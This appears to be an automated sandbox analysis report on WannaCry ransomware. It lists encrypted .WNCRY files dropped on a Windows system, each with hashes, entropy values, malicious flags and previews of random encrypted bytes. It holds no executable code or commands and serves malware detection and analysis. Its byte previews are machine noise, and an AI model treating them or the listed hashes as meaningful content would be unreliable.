                                                  Preview:WANACRY!.........d.....R.D.0.6...3.aTB%<.0Fh.....:x...>..O........\.M..3...i.5xG......#q..G.C..n~....^..<...9$.Sm.'..oy:....!=...Z.1..9e.wXt..v\.d.W,"...l\..$..6..B(....d.N.....L...Q..LI/.(.u.]=.......H....F....c.bJG>.}.{:......$.G8lbVE^....~...f..I.2.....Ba......]+|.8Sq.+..J..k..'o.x..B.n.A>.vn=@{.{k.....+Z8..1.....nn..%....u...Q.l<.E....I.1`.(..s.n...9.Y/.TV.;U.g..s..w..?(?...1%E.py~_..........Nu.j.D....n[...+.I..>.."...#.v...)...$KK*,.v.k...S.&P.hR..n.F...:..;.^.?.D.MlZ.d8e.j........4-.p.,ip.;? ......c..!. h...pQ.....&Jr."L....wK.!..^..A.t........4..S.1..]...F..+.:......1+.J..ti.B(./d7.h$..uM\.t.~[.S.....!.jCj.w.-SA...?...v.j.Cl.g9c..G2+.;~.Q.%....U.6........c.\.....q...~....81r....F.W....mHmn.....:(.IO.KRq?...l.B1..N...m.J.o.........?hW.w....ya..m!..K.R.....1@..Z.......0..D.%.X.....E..r.n.y....TL.....7..~&...c...S....z\@....7g.Q.8h.c....t).z.L......_.R....K....v0......N.F....R..&.../..9..p.v.@5_*.CA.~....jg..@.I./q...=BY..:-H...x....Q.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):77560
                                                  Entropy (8bit):7.997642881789174
                                                  Encrypted:true
                                                  SSDEEP:1536:vhgEXgkVGtEx4ub4DLDzEt7qUpn3b1uKdPOnG7aT8x8THQFb7taTxm2+tNLU:JtkW4DHM3pn3YKdmnov8M+AU
                                                  MD5:779BF9E145CBDC4ADBD8D55998038D09
                                                  SHA1:7AE0BBC54262875A32EF7083DF316DA79BB90A77
                                                  SHA-256:A07ACADF2D82264D67489A906F4A88BF158FFF77D9E5DD1A6FF8463FBEF56099
                                                  SHA-512:F75E945EE3C3CA3DF8663214472AA9BFA568FE059F952D9841E888D4DCE965A1A500A7EA83B11E688996B9ECA54A65BFE306385F459FBCA113E92DE8BBD850CB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........).1T1....U.JG..MQ...Zm.FV.\...N0...O:.....".Y....=.............{].........<.)}...!.9...t...4....Q.-1.0..OX.tz..F..'....u.....<.%-.~...+"....cMG..-.r..e9..+..K..5P7G......a5.'.k....V<...j....U..R.S$.w8v...............\Y..8Fi..`.y.+t...C>...?.....-...........[.n.v.^..&,'..r`,@..L.P...)1Y....b....|~2.Ry......u..#n.....5.......pY...l.a7......b.Y......F...t"..*/....._..|`....!....jS.B..-.=w...=W....9P..>..um.....+.....y.......F...........D..o...'\...... ..<...E.9eD.....Xk|..*.5..I.....7 ..|y.$...-............t....h.U/cX6h.m@r..u..[....d.|8..N!~.,y..K.!J*...]..:..WT..S....$.....<.uiv.;.\.bml..U..1..B.y.?:U....k4...{0z..lP..n.1.n$..v..,...`!.52m...9.oe...$s..z.f....X.G.EEG..*...........?...`."D....q(..e*>w.h...GF....u..uS....<|.#.s..Q.w...WZ...j`4.*.>...@l.W._`.F.k;..-..I...#...1.....<o&a....7.u.....;....I....=@D..(.....&.F.C.XS.O.%'...+H.E..%..W.I.p[>.}....S.........zC.ke.....N..#....K....a..kr........U.N:....@Q...T'$rj..G.....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995360489278638
                                                  Encrypted:true
                                                  SSDEEP:768:mjgK6vmISu6FKeFaO7fAm8eHdg0d0HBAaZYNkUVoK20AGNlohn/Is:S56v96xNDAm8eHdgC0HLGqTK20JN2h/J
                                                  MD5:B17E17C57A30A5DB340CE8CCF77FF260
                                                  SHA1:836B0815496E755BD359A50AE7C6B25F2A3A2C82
                                                  SHA-256:1EA859E344F2F80395591B35522A74E3AD48BCCD2DC264962C2BF4EFFC391204
                                                  SHA-512:0D6E95564DC321847F36BAD896A28AD847C6C054B202F721C4173FDD66F1B8C008D8F76E843553912D84DECD3194782EBE4CDAAF40833AAA77CF1E45EF29A9C4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....\.S...&.V....bq.x`...L+.R.R...;...i.2..9...W...o.J.OKo..{>X._...K.g,....l.h.l.g+...#;.9.....V.yQ...r.LX.....y..e_..s;;.. ._D4n..HF.E..7|q6#.3..=..x.....e..$.>.+.v..*......f`..X.....[...(.....o...'...B..HG...+.u).|...w..y.^..8...o..h..:..y......v.......$.3F.k0..&..5...M.0.&..<.z.(W..J.0G9._.;../...4.1u..G\.8... P.P.h...P:7.2It^..:......ln(.!.a....2R4#N\......sQ.<=5@N.'.J...K...*+mU..a.:./..?VZ.L..p!...D/#...9...K.n...:a.l.D...(.c. .yQbg..+B(P.>D......9}X..$.>Kx.....0...x.v.p.+t.G[.. ..^Ndo..z-...LEq[.!..C...c2.6.,.aJ.k7X..n..~.;.>.@&.U...{...y.k..=3.d.9.a..C..TF.o.B.cP..j..H...Vz.....xo3:.-<\..+...X#@ ...k.H._....S=..#.[GGpnP~...m...s.+.._Wl.........0.}.3SZE.p...[..v.uJ%$..............T.\.gkC.$x.~.K..f......W....Wi...&z....].w..5.C...[..)3X..7.Y....+%...f.(...F.)........QI....3.NY..$b.g.F^.(..S.x(.?....9T.`=..~..s.a.H.!...~.>n34.....K....(O.=......GB..y....ro.~,.......-..X.._3..&........1.O9./f.kb+..a.V..\.c0|.|W..O..&j'B`w...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.994866349290046
                                                  Encrypted:true
                                                  SSDEEP:768:UP07JS+WpTGwCFSMz1ZTq4Hjh0U/U1gcfRxXUid6LWj9GRcAxgqgmWF+h4g:4Wh95xRZ/MhxKy56cAxgqAF+h4g
                                                  MD5:6725664808B500996AD01097968D9EFA
                                                  SHA1:9C03C6D447016D05380823B860B06C5C3677EBB5
                                                  SHA-256:C9B1D8FFB20BE451531ED6E71EA68F7E02DFFD9844A95591F0C691A4D59B2C57
                                                  SHA-512:1284671E71D771A2577E04C9178D13835638E58378DDE9965D96DA808BCEB0D73BB591BD2B7B582701E1834AAEFDE76008ADC178E492948699D0079274048EEF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......W...91vv..c.x...X..]2....<NK./.t.....".p+..9r..b.s.u0@.....N![..E.5.;.v. .l......N.}/.$u.|G@..O..&......w......q....r..o..{.......L.<o;.*LBd+L}o..s......l.d..`...L..Un.Szj{.1.C...#;......fa.%.K...$..4..#.....?1..ipj.#:.....?.1.U.j.w..U.(. ...Uc....v.........T........D....9....:7.,.l.l.2..Q..&;.U.P&...P.=...F....|>#.H=.".G...~!H-..4..M.ZCQ.y.....{.@.j.C:.../.3.%8`.P/.........8.|. s.f........SJ..U.......s{...ve/?t...N.0....c.Wk........0...9..$G.-8. ...Q7..jrxh.......LU ..;.[...........Z-{.e.E0;.5D=..1{&.e...l.(w..0z.#,.q...0..n\.......`..*!.]......Sp.....d......=4..z......%?..T.XI...%....id.o%}..M.nd..Tle.":-..ja....H...@.Z/m...Zn..Qa. V./.Mh.96.a...&.8j......P!....1.!%m..........l....`.....RCB..+. MR..C.G}R.z..z.}>....*}P..Y.....]'}.......!..N...y..9........rO%c.....y.m.m....P....b.3..M..K..`<.Y.........>...D.Lr...I.t........~..A..tyg.C.'a`.sF...?Y.m.A0..4!P../..N]o.6..S..L.`.Z.e...^.N.gt.G...u..O.......L.9.E...'.<...(.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995291944460258
                                                  Encrypted:true
                                                  SSDEEP:768:K9Iduya5ghwyO5H8Sm9ItP7ThYgDePODTVIg1iOFGl:YIMghwpyKtD1zDMOlhiOFo
                                                  MD5:414C38FC49425AA5CFC59EED77BA3BAA
                                                  SHA1:004848566D9A798036E65C1207E1F2EE12726C5A
                                                  SHA-256:6DBD82544E19C834E2A1596BAA5270C2AEF818BDFF315AB6250E45C70E07766F
                                                  SHA-512:01AEE161FB9581C8AA516AD85B5EE99BD916DDF48E881F65B5A8ED96039FA06537CB8F3F66074FCF0DEAAF3411AB532F65A05AE6626F2693E2418610F1345CA8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....b.^u...M.t%..3S.d..}.....`..:h..#...PPbR...%......LL...oz..C?........x..t..t.Pq.....kj..z..I.i.m..$4...*..ou.8,4......XW....$..sqd.f....QT-.T.8.=.L....z.:w...[......a.D..h.s..........v.ZZ..YB..9...s..<,.{F....o.O6.Y....Y..UM...V...-......._T..=....v........:Z.U!R...6.i.=./....QD...?6.?1>....rN....2.p_..u..!.....T.X..[..s.....Q:bVG.:.(...?E.+b5...O5u..-.dC..?$..^.v...dr..p....C.9`i.e. .\..X.a.?.X.............C.`..3'.p$.>.;...A......au.a>..p....I.9...Q.{../O.R....W3.+..y..........1~=.p.I...H.XBH8.Z..O...'.Awk.fK..b...K...p...-.v.!f..R..Gh...$.[....*.B...\...b['B._..)2M...J..:B..D..W...@.....A$d..Kq.q.X.B.TPw.......9Fu..L.0.1..chN......3`Oa>^....1...!9m....+_..2\.....\..#...~-{t;}8..X.&.*>.TD.z.Z..H;..'..&q.[!......f.J..s.....I.F>...........5......1..w,.x.*Q..W._...2=.v.u..._.QH.....s.Rq......3q.j..-.+9.=.^...4._..JjG.d.a.....2.U=.=.....U..j.....b...A..=l^.*5..)...B......+A...........>.<.'t....isy0W..........E....H.0G~..N

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1426184
                                                  Entropy (8bit):7.999872830469767
                                                  Encrypted:true
                                                  SSDEEP:24576:nGK6jJ5LsCw9+muSrvE4O1FhxScg5LRh070Ii59qNW+fmaVnq71WVcsvEZCD1OhL:GK6jAC4TjveiNBRh07s59qN1fmqnq71Z
                                                  MD5:73D409807E07B9F78D372B3F1ACBA0A3
                                                  SHA1:00013C43E940E6064DB7A2189CCBA46E4EEB9560
                                                  SHA-256:54FEB3A4BCA0EDB25A3B4D126EFCC4D9DA1DFFB68BF1B2729EB8EFE955091883
                                                  SHA-512:371B005C1F3F2F296A49C5B42870FDF4DDF0E08AC5751F1E598B7E28890C2B7283943C59E2337A15F912A1F1040EBE23BACC98BDB439F0F50B78056242003CB8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....E...k..Q5.._o.e^.......H....p(h.2.x../.|...KA..x9&5..n..u9C)A.h&..yK..AtEY)...-.:.q.Q.....u..Q4.....\;.....v,.0...\JL..*..m..N.-...!../.h......44(R.:...a...g.W?GMA.M.y....w3@.g..X.Xg.Q.3!)..mD#;b[...r.9'c......B..h7..!?.X..........q..G...x.N............J..d-..@..f=N.0p...3r.VW..\4K...J~..X......o....l.a.1...@]X0..f..nF.t4..n/./..k.....I..H!.X.i'.!..F..CG.........&z....gHj...W3B.8..R...a0.@..:J[..i.uE..@..A....oP......Z.w...K.|.F......)....R##!^...,Sm]..].-.Yv......S..i..+.k#..1V.#..Q.K\.L1..uj.........,9.VY.L.2'@.P.r.X.......gt4...[..J...S.j..B6(._TFx.m.......?.#.Z........b.'|.w+S.....sf.......J.+.....#...V6...W..a.tY..a^......m. .M........s..*._D.Q..@..v...8.-@...ycxt..UX..J..Uu...e...[.......D@,q..N..9?..u..F.&.<.j.F.D.pO....G.y.....~..1xn..8.T..5.......;.....B....d<.N|...x^.3.....f.Y..R..,..H.>R.*....S.T..I..za......M....7.G..5.]WV26......h.........#..&r.......,...F...N....F....9.,..w..08.B+Fy....M>...../H6z.n .qR.....r..Q.]2

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):533032
                                                  Entropy (8bit):7.999698359614149
                                                  Encrypted:true
                                                  SSDEEP:12288:UsRzd9qlwrL0uMPw5rP/r12HB0h2rzwSJkn9zeGrdsy62:Xzp4ZIVwHB0h2rM3njss
                                                  MD5:4DEC3D670ADEFE009000488A6DFEFC99
                                                  SHA1:796DCE1B46826AEDCF697424079F594A204FFA14
                                                  SHA-256:EA8D22C66444A1CBAD225BA947F04B20834DCD233906CDCB2991C45BDF9F2450
                                                  SHA-512:CA285EA26560BEE08903696D3B592E6E28EDFB13CD12401BFD35EF4FE8F355DEBD3298841F0EC77FA7810B8F3AB6997C438530556F701277232E6A0CA76270EC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......7..&%....-4.q.V&....P.d..M?.&J.N...,.k....EQ)*.........[-........m..>.._.u..#t. 0..(..S{D.P*8.).p.,"....H>.../).4.mZ;.....+-..Z9.?..\CG...0....p.K.3..w#.XHS1+..ki.=(...W..<..R..u.V..>.$..L...[.sl.$.k..\x..|..0.].a..^BcN.?z..jN..q#.....b.9d.....!......j6.jI.Z..QV..b[B.I|..}....7^;.....p..3.C.......1.p.3.e.->E..k..Y.q..b-q5...}d8>ni.u.m.Bw...........F.&.l..DY.[R.@P..c.n=.8q..:.Ic....U.H.N..J%H..X.$..a.~.g.Y...9.W...s.z...Y..hb.W...[....$00)....1..8|'?.\....:^..%...j..\h...MF7L.`..m...UTG..C.t.5.....K+y.#g.N.....q.7.m.wC.?W.$.I.X$D}.f.....{.~. R.Q..k.\l..w..D.0.&Q.P...$a......&....GW.n.M....NS....ZL?.yJ....7.P5.+s....,....[<...'ms...^s..i.VKg....#...8.E..2....G..G..e.T......H.;....Z\..V..!.E.!$M.<...A\..VrR...T.,.wZ.R..a..).g....%.e(.A...W.iq.).......C.a..{B6T.8..d.{...iG.j...u....X.'..8.#...}...}..[yn%v.....8.V...@_i..dB5(`.J.L......-..v..MlF...V..I.z...@n....KG....d.}.`....m.F@......},....M.u=.c..=....y..g~).M...".D.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):41416
                                                  Entropy (8bit):7.996067559068154
                                                  Encrypted:true
                                                  SSDEEP:768:XRyNSpZtDNtfGkZIxntFUv/z9ApegKPVXiwIcVb/6yFfjlePX/G1dK2QYPW:nZ9NtfktWBAwJPVXiVcR6ypMPXWKMO
                                                  MD5:DC7BECE225AF85ACC679C465C641B118
                                                  SHA1:49760470B92961FE13E8D9C2FC428798561D4C2B
                                                  SHA-256:B51BB7EA6A5B484486C3BE2B76F34BE8C4961DC16E398319BBACEB0BB0511CB2
                                                  SHA-512:917B26BEC6D02E4C12AE6286BE2E6BB27FCFCAE54C69BEB685FFC5BE7419E402179990E87C8B0D7BBBB7FFE677027C033FE6465487E531F360451051EFEC44D9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....)o....rl.l.`2.V.....J.6.D.5.vN.a!.)....z.....>.."......0:g...'ma.Lh42.......W.^...e..P.E..o..~.h_.Mr.v.....$.#.j....z........k..V...V;...}....]U.......R-A.I.W.|E...._......z.&X...\.ar.g..Vuu63.u.\_..Jk..*..VV. 3.......{ .=Lx....zl....N.=..H,6.............N~..2*..\I..8...'..Y...J....^.C...o.#.^.$A......G..=O.t...>@I.C...T.;...\.I`.k.Gs.fP.M...7...8.N....A..E.8A......8.Bw......j.d[....8.m/.Tz.]|../...?F3..U........S..z$......b.r..(..g.......(C...L.N."..|.7[(p.3...F.H;.d..h.XI.A*.|..?.f..p}O........WF......L....a......q.!m.....R^d..._y......:D.K&.;K..v..R......B.Z^....%..A..UO..l{<.O..E..$g|.?...Q.*.+...9......FW).... ....A&0..On8..5?f....`jk.4.........(....F\...?...Ayj...?.I.=D.O.x..._.8..O.]z!...._.a.O..$...DL..._..*..[v~.!.....K`.h.}._...... .z(v......k..<..P.H.n(..t0.v.9......Z.bGh.......j..]*..A......F.t.l.HI..-.'.3k....~...t.........m...9O..v...`..IZ.#...No1.......7V...#.......j.d1.c.t...vs....$.....\!..3.u+MiJ?t]R..y..6;.^>.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):104008
                                                  Entropy (8bit):7.998294966174257
                                                  Encrypted:true
                                                  SSDEEP:3072:M4xNlwX3ktPOy0Hk65fo1Tul1BauOivx+G2pLgMPlV:MgNlwX0MnEEgybauOiJQpLPlV
                                                  MD5:0411E63884263162ED0BB6FCB6EBE6FA
                                                  SHA1:3EA982158ABA9002B67DB2FBEF56DC1F16E3DC97
                                                  SHA-256:40764A2C4BBD2DCA53D102CB4AE65EB74248FA593CD62CE257D6DFECB40488AE
                                                  SHA-512:22B9532A4767E62DE26C02683C6FC54FC977EB68685C52D4D270F6431C99A3CD9077E8B99BDE296004D0793DAAC4C97994578421494FF2C8E0DE00213805CAD6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......]...I=..p..av...|...3!EX.B./.Q Y0.t..D.Cd|..GS]j.1.-.C.7..,.S\m'.,.%..Z.P.yg>.....d...He.[....P.Lv.`..U...4U..w...S..7.8g.\.....e\n.......(..E.5..V..$.".M.RI!..6+L........an..U........,.[!..+..<....^Z..@=.....N..b.>.m...b......q..G..7Jr...0....%.......*.9w....k..P...m...q....JvA....Ft.-lBo@.]..L.....ak......<T........._..@...._....z..m..H\...T.xu.Z.S.......k].2.c?..p..'9.T.......`e...5$...{......n.B.h.*...o.F.5....`.R.Z..Q,...M.~$U...}V...........rZ......s.N..#z.!..f....lbAHmi..xr.......0.R.1.J...A.G.s..MV&.e....J.......a...J.....f...sg....'..%.@m....E....[Qp<o.z.K.e...2......{.Y.....#).o..........L.2.nX.t..C.1.ls.%."x....8..`.........t..m.../...[.{..k.\;....U.\......D_)......~...A.}\......&.xx....P...........+yw........* ...a.w.nt.h.K*(...(0l.zDn.:..7.TA..g3z0.....f..^../...u.?O*..'_P....t..(.Yis..}..8.i.olxD....2......k.)...-....30}0..v.._.6..1..n72x....i-.BA.m*...1.-z...7.!.'.^X1l.A..9P.\..j......1.P9c.........&Q.T...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999254386291626
                                                  Encrypted:true
                                                  SSDEEP:3072:plzujDX1cfM7lUcbrStuXtWbaHhO5Zo0nnia4AwHtMXdKTDLx2CQde5:CjDX1cU75rSt4ceHcHia4ThnECd5
                                                  MD5:4A2F90B0A9AFD0230332501F225E0D52
                                                  SHA1:37C89AF34D6A963DED8A323F6AC6B8B333987CB3
                                                  SHA-256:4E4051B15B4080CE2E314CEFFF67CD4DA778FDCE102580FD7ED00C7D08419219
                                                  SHA-512:3A529D2EE9EFA12FB900AA7A2641296391F96294CE1D5823A0A77AC373750A9C1C5E94FF89AF648829155B61EA229357292094DF2594678AE48FEB9C854E5712
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......KlG..u.WK..0E7..E...""..9.K.<.....8#..K$/...c(<.....+3.!~m...[....K..wU.........R...G....Tym......`<..*..MDj~.....%d.q,....1Ict.U.'.YB.e..N^*g.t...m....M..J....|....J../.PJ.F%.<fK.(>.s.(.'".J...6.i....U.2.zdf.hB.8a).!.R..F...f.Y..Z./.P..:.....B.......CoZ.}..o....t:..8.....>./9..~.(./...Q..[.F....e..1.w.#y..?bk.....g...2.g.i...z$..%... ..p..m.].....v..&.z.~.D..v...._+.,...L....."..-.:....I.......i...jK..p....`.....f-m(. ....@.c.9W...%.ZA.n..~...VK.<0k..:K......'1J.....~ ....R....M...V.F..6.!...W....Y.......m ?g..........=....@W.a.D2..;I.W?..9..,......>."t...n..sP.{..+..B=.....*l.D.....\.a..S...#..........XY ...cmK.Po.C..2H...v..<....X.1....].Kb;..$.....Nk>=..%0x.zU6.C.@..(+`.-..q.x.".0..&......d..u..t.a1\}:q.I..2W\...Ig.~*..l;;.r...T.E.....<>...bc.y..U1=......_..3.@L#.H).."MS.U.... o...K..l.G.E.h_..Q.f...K...+......~t.....4.p...+..T.r:...]'h..Y*..4I#r).A......U...`.o..P.....T.|B.n"0b..Xq.n.5..[....j....../..zP

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999152563242
                                                  Encrypted:true
                                                  SSDEEP:6144:80lBSOwDjyN3vOg8A73bgaAskCoeVLl6+3JbTObf2wdnCcr:FbwveZhr1oeFl6+5+
                                                  MD5:1DBF0AEB41734B9A40EE561E4EBC3E9E
                                                  SHA1:D641B18E7800772BBA1D53BECB9477E15E4A0987
                                                  SHA-256:6B73C5C07F8676E5F6F55132F728C732E3510BB62A5DA5A847A062DE7AAF36B7
                                                  SHA-512:F0287B3DFA3E102FEA52BF402D1D6C1DBBA60DC6834EE56FFECE54C1AC9C6589450F3E28B5A28EBD527FAEA43828E61299B302E0480101D234B8AF12DBA84B9F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........ z.xOm.$Z.u.].2_.`....?...!?..r$...~..>D......=e...a...~t...\NO..Xl".u>.{.'F.0...p6.k.....G{_..t.j..*.e.i....xNBC..p..5.p:&..K......,(D#l...B[H.&. "e]C>....B.8(._.MY.5.td...S...."......(:zk=..>...K.......6....>.p..0o.R.9.+.-......u.s.g..@ 6{..T}H.....B......P..."...y.S.|XS........../.......4....0.*.URC..@....@|.M...'...1>A.H.......V.`..*..Au..|.@.+ _/.^..Q.n.4..p.....>i._.O....M.h6...;...A.d|..6...:...O.t.J0..".gz....7.-.1..B...b...sM.I.<..Q2....M....,.EW.S..!."..E..Xk.$z6._V.$.o...Ih..'........b.......7,...<XP*.+.>F_....'.....Mx.@..I......X`..}#...0...T.r.C..3...".K.>W1K.|2.....=.}e....}t...\`.........f.DYKb....R......$.n\B....J.....r0K_.J"=../.};...Rk.m._V...5..E.j.LU?.,......dh.V...8....F...ap=..@`3.+.>....7.X.|vN.mF...3..U.....1{..y..u...$..w.A..y..gbG...D.......I.,@.._.z8..G..b..=B..9F..\...>..@>...z.06...vbbTU.`LS..P..{..S.X.....A.QB..y...V.!.........r..Y.z..B.8..7!.q^...<D.Yk>.F.T..y/W..7=.k...#......&...T*...(a.O.zx

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202120
                                                  Entropy (8bit):7.99910724453835
                                                  Encrypted:true
                                                  SSDEEP:6144:K98tySpDP4vqu8myL/ojO37hWfx0+j2F0N:IS/ojOFgWC2FO
                                                  MD5:2E3BA76735C3199373CFDA4742F986F6
                                                  SHA1:DAAB04FDC298EA37B2820BD41A4DC17C69FE2025
                                                  SHA-256:E600839EAFD95446C673A9AF8202B141E4014C866B56076C91E11FE8EFFD0E58
                                                  SHA-512:96486958F79270244356046717954F97A195DD492601BEBB5C74168CD445C35D551FAA3AD078D434E57B5381455724AC8FBAD07A39794FC271951BEB28FE74D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....}.0t_CS..r.:...[....c.C..cw.m...Y.A....?...U.x.g.6...Rlv..0W......|&V.~?.5+O+.q3...&.....`P..J..4'.B.,{.$.'m....B.........Q.....9.....\....%..u..,M....t./0U....l.|I.L..%.+r.5...c.......h.6p\.....-j..^?.....1 ..-.(...y.1..^.TjC.X.r;/1,..`[..!....c.......J].........F'...........EP?2...-..z....q9...... ..-..K.n,i...,*.#..xj..gk.l1.G..?...:..z.Y0%...B.JD..9.... St.\y..._/...,..%..fL..<d..y...~zM..._.uL.n-:^ .Y.0..1....@VI.....z=..Ut*A..fH".....V.~....<..h...<.C'...@<..tD.(\".,.....3-ji.M?....8...........d.L..p..4-...B.E.v.E.D...t....../2......5.L..........V...v%BR.1.....v.........;..........D.#.q]:.-..?......wXBT.wrQ.8i.{..g.}.;,...i..jC......n#Ty....y.h.....?.......)H.W*.U.v2./4.....A...X...7..r....E.t...r..=.......m{Pw....$.ZV.gb$...c.."4..........b...n.t'..?....R..J....*...G.ee.>...$l8.a_..J9.F.B..?...wS..o....`.D.HAI,S....'..fo...F.B.'....u..Y....~.w.n.K.q.m...Vi.....C..N.B..R.W.Q$P?.z...d._...T.r..w.3>*.+...c.Z.......`.J.k-t...j."P..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34536
                                                  Entropy (8bit):7.995221646879254
                                                  Encrypted:true
                                                  SSDEEP:384:L3okjUd03YY5z8jpn3Jitmhm4XPiokrzmgS2PfK/vks9b6icHYxIrPiRqiLZFBhD:LY6Jw3hNUdfBkbRxxKHiVlWs1i6rDj
                                                  MD5:C67F715F9D1BC5B175D3487235A3DD0B
                                                  SHA1:964E301602855A719226FE2C79AED421295CF216
                                                  SHA-256:E013243A00C21FA29AF9FE4DA33071676B16CB3539B5BE6D693B61DF61E5095D
                                                  SHA-512:739A315BCFA1F29951395B36CC4B841EF01771C31EC89F32045070F2656BC934C9E4D3E912D43083A49BF224A59B319697AC2602B937629679B580549A6430DD
                                                  Malicious:true
                                                  Reputation:unknown
